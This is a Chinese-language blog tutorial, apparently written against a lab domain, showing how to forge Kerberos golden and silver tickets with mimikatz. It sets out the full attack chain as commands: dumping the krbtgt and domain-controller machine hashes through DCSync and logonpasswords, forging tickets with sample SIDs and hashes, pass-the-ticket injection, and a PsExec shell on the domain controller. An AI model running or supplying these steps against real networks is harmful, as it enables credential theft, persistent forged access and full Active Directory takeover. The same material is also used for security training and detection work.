基础环境:
靶机:windwos server 2012 + windows 7

1.黄金票据

制作黄金票据的4个条件:

  1. 域名称
    net time /domain
  2. 域的SID值
    whoami /user
  3. 域的KRBTGT账户密码HASH
    我们使用mimikatz提取:
    mimikatz "lsadump::dcsync /domain:yuaneu.ro /user:krbtgt"
  4. 伪造用户名,可以是任意的

使用mimikatz生成黄金票据

mimikatz "kerberos::golden /domain:{域名称} /sid:{域的SID值} /krbtgt:{域的KRBTGT账户密码HASH} /user:{伪造用户名,可以是任意的} /ticket:{生成的票据文件}"

mimikatz "kerberos::golden /domain:yuaneu.ro /sid:S-1-5-21-1510176710-2219810952-449743168 /krbtgt:b71b4e4a428484726fea3c7d923c9715 /user:test6366 /ticket:golden.kirbi"

然后会在当前目录下生成票据文件golden.kirbi,一般默认黄金票据的有效期是10年

黄金票据的利用

首先我们先确实没有权限访问dc

首先我们将生成的票据复制到域成员机中,然后使用mimikatz将其导入到内存中
kerberos::purge 首相将原来缓存的票据全部删除

kerberos::ptt golden.kirbi 将黄金票据导入到内存中(Pass The Ticket)

然后我们可以通过mimikatz中的kerberos::list,或者klist查看以及缓存的票据


然后再次测试成功访问域控

当然也可以通过psexec.exe获取shell
PsExec.exe \\dc.yuaneu.ro cmd.exe

2.白银票据

制作白银票据的5个条件:

  1. 域名称
    net time /domain
  2. 域的SID值
    whoami /user
  3. 域中的Server服务器账户的NTLM-Hash
    mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

    注意这里使用的不是Administrator账号的HASH,而是DC$的HASH。
  4. 伪造的用户名,可以是任意用户名.
  5. 目标服务器上面的kerberos服务
Service Type Service Silver Tickets
WMI HOST RPCSS
PowerShell Remoting HOST HTTP
WinRM HOST HTTP
Scheduled Tasks HOST
Windows File Share (CIFS) CIFS
LDAP operations includingMimikatz DCSync LDAP
Windows Remote Server Administration Tools RPCSS LDAP CIFS

如果我们需要获取的服务是Windows File Share,那对应的kerberos服务是:CIFS

使用mimikatz生成白银票据

获取到域控主机的计算机账户的hash后,我们在域成员机上使用mimikatz生成白银票据

mimikatz "kerberos::golden /domain:{域名称} /sid:{域的SID值} /target:{目标服务器的域名全称} /service:{目标服务器上面的kerberos服务} /rc4:{域中的Server服务器账户的NTLM-Hash} /user:{伪造的用户名,可以是任意用户名} /ptt"

mimikatz "kerberos::golden /domain:yuaneu.ro /sid:S-1-5-21-1510176710-2219810952-449743168 /target:dc.yuaneu.ro /service:cifs /rc4:a9cd1dca5c2a2c56b9dd34c0dc782062 /user:silver /ptt"

最后修改:2021 年 09 月 10 日
如果觉得我的文章对你有用,请随意赞赏